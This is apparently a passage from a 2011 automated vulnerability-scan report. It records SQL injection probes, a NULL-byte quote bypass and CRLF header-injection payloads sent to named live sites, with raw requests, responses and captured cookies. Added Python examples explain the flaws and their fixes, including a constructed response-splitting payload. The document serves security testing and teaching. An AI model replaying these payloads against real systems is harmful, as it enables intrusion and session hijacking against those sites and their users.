Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 23:09:31 GMT
Server: Omniture DC/2.0.0
Content-Length: 427
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3 was not foun
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgespvideo,wdgespge/0/FAS-2.8-AS3%00''/s19650499410927 HTTP/1.1
Host: w88.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response 2

HTTP/1.1 404 Not Found
Date: Wed, 23 Feb 2011 23:09:31 GMT
Server: Omniture DC/2.0.0
xserver: www187
Content-Length: 0
Content-Type: text/html
Connection: close
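
The two bypass mechanisms claimed in 1.98 through 1.100 (a NULL byte hiding the quote from a native-code filter, and a double-encoded %2527 surviving a filter that runs before a second decode) both come down to validating before canonicalising. The following Python is an added illustration written for this page, not code from Omniture, Adobe or the scanner. The blocklist, the NUL-terminated filter model and the two decode steps are hypothetical stand-ins for the behaviour described in the remediation text; the real w88.go.com stack is not known from the report. The probes are the path segments from the request lines above.

```python
from urllib.parse import unquote

# Hypothetical blocklist standing in for a WAF rule set; whatever filter (if
# any) sits in front of w88.go.com is not known from the report.
BLOCKED_TOKENS = ("'", '"', "--", ";")


def cstring_view(value: str) -> str:
    """What a native-code (NUL-terminated) filter sees of a value: everything
    after the first NUL byte is invisible to it."""
    return value.split("\x00", 1)[0]


def filter_blocks(value: str, null_terminated: bool) -> bool:
    """Return True if the blocklist would reject this value."""
    view = cstring_view(value) if null_terminated else value
    return any(tok in view for tok in BLOCKED_TOKENS)


def backend_sees_wrong_order(raw_segment: str, null_terminated_filter: bool = True):
    """Broken ordering from the remediation text: the web server decodes once,
    the filter runs, then the application decodes a second time.
    Returns the string that reaches the backend, or None if blocked."""
    once = unquote(raw_segment)          # web server's single URL decode
    if filter_blocks(once, null_terminated_filter):
        return None
    return unquote(once)                 # application's redundant second decode


def backend_sees_right_order(raw_segment: str):
    """Fixed ordering: decode exactly once, reject NUL bytes outright, and run
    validation on the canonical value the backend will actually use."""
    canonical = unquote(raw_segment)
    if "\x00" in canonical or filter_blocks(canonical, null_terminated=False):
        return None
    return canonical


# The probes from findings 1.98-1.100 as they appear in the request lines
# (path segment only).
PROBES = {
    "plain quote": "H.21'",
    "null byte then quote (1.98/1.100)": "H.21%00'",
    "double-encoded quote (1.99)": "b%2527",
}


def run_probes(handler):
    """Map each probe name to what the backend receives under `handler`."""
    return {name: handler(seg) for name, seg in PROBES.items()}
```

Under the wrong ordering the plain quote is blocked while both bypass probes deliver a literal quote to the backend; under the fixed ordering the NUL probe is rejected and %2527 arrives as the harmless literal `b%27`, because nothing decodes it a second time.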


1.101. http://wellness.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://wellness.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 50674406%20or%201%3d1--%20 and 50674406%20or%201%3d2--%20 were each submitted in the menu parameter, appended to the original parameter value, so the requests below carry menu=150674406 or 1=1-- and menu=150674406 or 1=2-- . These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the differential is substantial: Response 1 (Content-Length 21003) returns the full top navigation, with the Home entry listed twice, while Response 2 (Content-Length 2378) returns an empty topnav list. An always-true condition matching every menu row and an always-false condition matching none is exactly the pattern a boolean-based injection into the menu lookup would produce, and it is far stronger evidence than the 404-only differentials reported against w88.go.com above.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=150674406%20or%201%3d1--%20 HTTP/1.1
Host: wellness.glam.com
Proxy-Connection: keep-alive
Referer: http://wellness.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=hretqck57tr5s4l1p7dp779524; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:37:54 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 21003
X-Varnish: 303283730
Expires: Thu, 21 Apr 2011 01:37:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:57 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a 
href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover='showSubMenu(12)' onm
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=150674406%20or%201%3d2--%20 HTTP/1.1
Host: wellness.glam.com
Proxy-Connection: keep-alive
Referer: http://wellness.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=hretqck57tr5s4l1p7dp779524; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:37:58 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2378
X-Varnish: 303283835
Expires: Thu, 21 Apr 2011 01:37:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:37:58 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://mindbodyspirit.glam.com/' title='Mind Body &amp; Spirit'>Mind Body &amp; Spirit</a></li><li class=''><a href='http://healthyplanet.glam.com/' title='Healthy Planet'>Healthy Planet</a></li><li class=''><a href='http://empowerment.glam.com/' title='Empowerment'>Empowerment</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' 
target='_blank'
...[SNIP]...
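
The 21003-byte versus 2378-byte responses in 1.101 are what a menu lookup built by string concatenation produces for the two probes. The following Python reproduces that offline; it is an added example for this page, not the menus-plus plugin's code. The table, its rows and the query shape are assumptions modelled on the navigation entries visible in Response 1 (the plugin's real schema is unknown). The hardened lookup shows the same two probes producing no differential once the value is type-checked and bound.

```python
import sqlite3

# Constructed sample table modelled on the nav entries visible in Response 1
# (labels and hrefs from the page); the plugin's real schema and query are
# not known and are assumptions here.
SAMPLE_MENU = [
    (1, "Home", "http://www.glam.com"),
    (4, "Fashion", "http://fashion.glam.com/"),
    (5, "Trends", "http://trends.glam.com/"),
    (6, "Runway", "http://runway.glam.com/"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the plugin's menu table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menus (id INTEGER, label TEXT, href TEXT)")
    conn.executemany("INSERT INTO menus VALUES (?, ?, ?)", SAMPLE_MENU)
    return conn


def vulnerable_lookup(conn, menu: str) -> list:
    """String concatenation: the request parameter becomes SQL text, which is
    what the differential in the report implies for javascriptmenu.php."""
    sql = "SELECT label FROM menus WHERE id = " + menu
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, menu: str) -> list:
    """Type-check the value, then bind it; the SQL text never changes shape."""
    try:
        menu_id = int(menu)
    except ValueError:
        return []
    rows = conn.execute("SELECT label FROM menus WHERE id = ?", (menu_id,))
    return [row[0] for row in rows]


def boolean_differential(lookup, conn, original: str = "1", marker: str = "50674406"):
    """Reproduce the scanner's test: the original value plus the report's
    marker with an always-true tail, then the same with an always-false tail.
    Returns (row count for 1=1, row count for 1=2); a difference is the signal."""
    true_case = lookup(conn, f"{original}{marker} or 1=1-- ")
    false_case = lookup(conn, f"{original}{marker} or 1=2-- ")
    return len(true_case), len(false_case)
```

With the concatenated query the 1=1 probe returns every row (the analogue of the full navigation, Home included twice, in Response 1) and the 1=2 probe returns none (the empty `<ul class='topnav'></ul>` in Response 2). With the bound query both probes fail the integer check and return nothing, so there is no differential for a scanner to detect.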

2. HTTP header injection
There are 31 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
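
The findings in this section all follow one shape: a REST path segment is copied into the Location header of a 302, and a CRLF inside it terminates the header. The Python below is an added example for this page, not DoubleClick's or Google's code, showing how a downstream parser reads the split response and how the remediation above (reject anything below 0x20, then percent-encode what remains) closes it. The serialiser, the parser, and the Set-Cookie and body payload are constructed for illustration; only the static.2mdn.net redirect target and the 9ce4f prefix are taken from the report.

```python
from urllib.parse import quote

# Redirect target taken from the report's responses; the path segment is the
# attacker-controlled "REST URL parameter 1".
REDIRECT_BASE = "http://static.2mdn.net/"

# Constructed payload: the report's probes stop at an opaque marker after the
# CRLF; this one goes on to add a header and, via a blank line, a body.
INJECTED_SEGMENT = (
    "9ce4f\r\n"
    "Set-Cookie: session=attacker-chosen\r\n"
    "\r\n"
    "<html><script>alert(document.domain)</script></html>"
)


def is_safe_header_value(value: str) -> bool:
    """The report's minimum rule: nothing below 0x20 may reach a header.
    DEL (0x7f) is excluded too; it is never valid in a header value."""
    return all(0x20 <= ord(ch) < 0x7f for ch in value)


def unsafe_location(base: str, segment: str) -> str:
    """Vulnerable pattern: the path segment is concatenated into the redirect
    target untouched, so CR and LF travel straight into the header."""
    return base + segment


def safe_location(base: str, segment: str) -> str:
    """Hardened pattern: reject control characters, then percent-encode the
    segment so only URL characters remain (';', '=', ',', '[' and ']' are
    kept because the report's ad paths use them)."""
    if not is_safe_header_value(segment):
        raise ValueError("control character in redirect path segment")
    return base + quote(segment, safe="/;=,[]")


def build_redirect(location: str) -> bytes:
    """Serialise a 302 the way a naive server does: header values are written
    verbatim, so an embedded CRLF becomes a line break on the wire."""
    response = (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        "Content-Type: text/html\r\n"
        f"Location: {location}\r\n"
        "\r\n"
        "<h1>Error 302 Moved Temporarily</h1>"
    )
    return response.encode("latin-1")


def parse_response(raw: bytes):
    """Minimal HTTP/1.1 response reader, as a proxy or client sees the bytes.
    Returns (status_line, [(name, value), ...], body). A header line without
    a colon is kept with value None so a split header stays visible."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        headers.append((name.strip(), value.strip() if sep else None))
    return lines[0], headers, body.decode("latin-1")


def header_names(raw: bytes) -> list:
    """The header names a downstream parser would see, in order."""
    return [name for name, _ in parse_response(raw)[1]]
```

Run through the parser, the unsafe redirect yields a Location of just `http://static.2mdn.net/9ce4f`, a Set-Cookie header the server never intended, and an attacker-supplied body ahead of the real one; that body is the route from header injection to script execution and to proxy cache poisoning described above. The hardened builder refuses the same segment before it reaches the header.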


2.1. http://ad.doubleclick.net/ad/N3186.Glam/B5123462.24 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3186.Glam/B5123462.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9ce4f%0d%0aac0a5c1f86d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9ce4f%0d%0aac0a5c1f86d/N3186.Glam/B5123462.24;sz=1x1;pc=[TPAS_ID];ord=0.2317659705877304 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://health.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9ce4f
ac0a5c1f86d
/N3186.Glam/B5123462.24;sz=1x1;pc=[TPAS_ID];ord=0.2317659705877304:
Date: Thu, 21 Apr 2011 01:39:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/ad/N5295.Internet.com/B5200652.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5295.Internet.com/B5200652.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18288%0d%0ae6d3fc1125a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18288%0d%0ae6d3fc1125a/N5295.Internet.com/B5200652.6;sz=300x250;ord=202160337? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18288
e6d3fc1125a
/N5295.Internet.com/B5200652.6;sz=300x250;ord=202160337:
Date: Sat, 26 Feb 2011 01:58:23 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/ad/N6296.128238.MANTA.COM/B5149855.61 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6296.128238.MANTA.COM/B5149855.61

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 83f7a%0d%0ae13b4210b90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /83f7a%0d%0ae13b4210b90/N6296.128238.MANTA.COM/B5149855.61 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/83f7a
e13b4210b90
/N6296.128238.MANTA.COM/B5149855.61:
Date: Sat, 26 Feb 2011 01:58:23 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 46e58%0d%0ad12743e2198 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /46e58%0d%0ad12743e2198/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=Bp10zTX5lTciZE5_7lQeE9JCSBvvP_vwB47SQwRO_ic3PHgAQARgBIN2pmAI4AFDBnMn5BWDJhqOH1KOAEKABzdXY6QOyARB3d3cua29tb25ld3MuY29tugEKMzAweDI1MF9hc8gBCdoBH2h0dHA6Ly93d3cua29tb25ld3MuY29tL3dlYXRoZXKYAsoCuAIYwAIEyALj6egYqAMB0QOCjebmy6JxrugDP-gDuCroA7wE6AO5KfUDAAAARPUDIAAAAA&num=1&sig=AGiWqtzB4GPcUVih0rdhmgwjqhwnbga6Sw&client=ca-pub-9046165571664830&adurl=;ord=1431622572? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9046165571664830&format=300x250_as&output=html&h=250&w=300&lmt=1298518397&channel=6075235820&ad_type=text_image&color_bg=FFFFFF&color_border=CCCCCC&color_link=085192&color_text=FFFFFF&color_url=085192&flash=10.2.154&url=http%3A%2F%2Fwww.komonews.com%2Fweather&dt=1298497109003&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298497107724&frm=0&adk=1451502728&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=214183803&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&biw=1210&bih=642&ref=http%3A%2F%2Fwww.komonews.com%2F&fu=0&ifi=2&dtd=65&xpc=IMulXEmr70&p=http%3A//www.komonews.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/46e58
d12743e2198
/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10;sz=300x250;click=http: //googleads.g.doubleclick.net/aclk
Date: Wed, 23 Feb 2011 21:39:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adi/N3175.150800.VALUECLICK/B4640114.8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.150800.VALUECLICK/B4640114.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 54a5f%0d%0aa7eb5c386ab was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /54a5f%0d%0aa7eb5c386ab/N3175.150800.VALUECLICK/B4640114.8;sz=728x90;ord=618286296? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/54a5f
a7eb5c386ab
/N3175.150800.VALUECLICK/B4640114.8;sz=728x90;ord=618286296:
Date: Wed, 23 Feb 2011 21:53:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6296.8585.TRAFFICMARKETPLACE/B5027088.348

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7d1b6%0d%0ae937278b1a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7d1b6%0d%0ae937278b1a4/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B5zgm-31lTcvxAcv1lAfG8bDkBfbMhfIBhtia8hf45pedJwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi00ODA5NDYwNzAyMDE2MDM3oAHOifnyA7IBEHd3dy5rb21vbmV3cy5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3d3dy5rb21vbmV3cy5jb20vmAL0A8ACAcgC3oPPCOACAOoCK0tPTU9fSG9tZXBhZ2VfSHlwZXJsb2NhbF9BZF9TbG90X0lQXzMwMHgyNTCoAwHoA7wE6AO5KegDpQH1AwAAAET1AzAAgAHgBAE&num=1&sig=AGiWqtwrVt1jASVwF2uSYkvFy5KX9XmTWg&client=ca-pub-4809460702016037&adurl=http%3A%2F%2Fad.trafficmp.com%2Fa%2Fclick%3F_-611797114104433*_3107*lvur_99*uid_115*LsT_3443735*xOr_3247**1bsnn1xr8sjt2___3533310**0_3805*MEn_114**_-862839443;ord=4972427075776531456258795481640? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d1b6
e937278b1a4
/N6296.8585.TRAFFICMARKETPLACE/B5027088.348;sz=300x250;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 23 Feb 2011 21:38:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adj/KOMO/HOME [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/KOMO/HOME

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 114ab%0d%0a56fe5779902 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /114ab%0d%0a56fe5779902/KOMO/HOME;sz=978x300,978x30;tile=1;ord=3730400381609797.5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
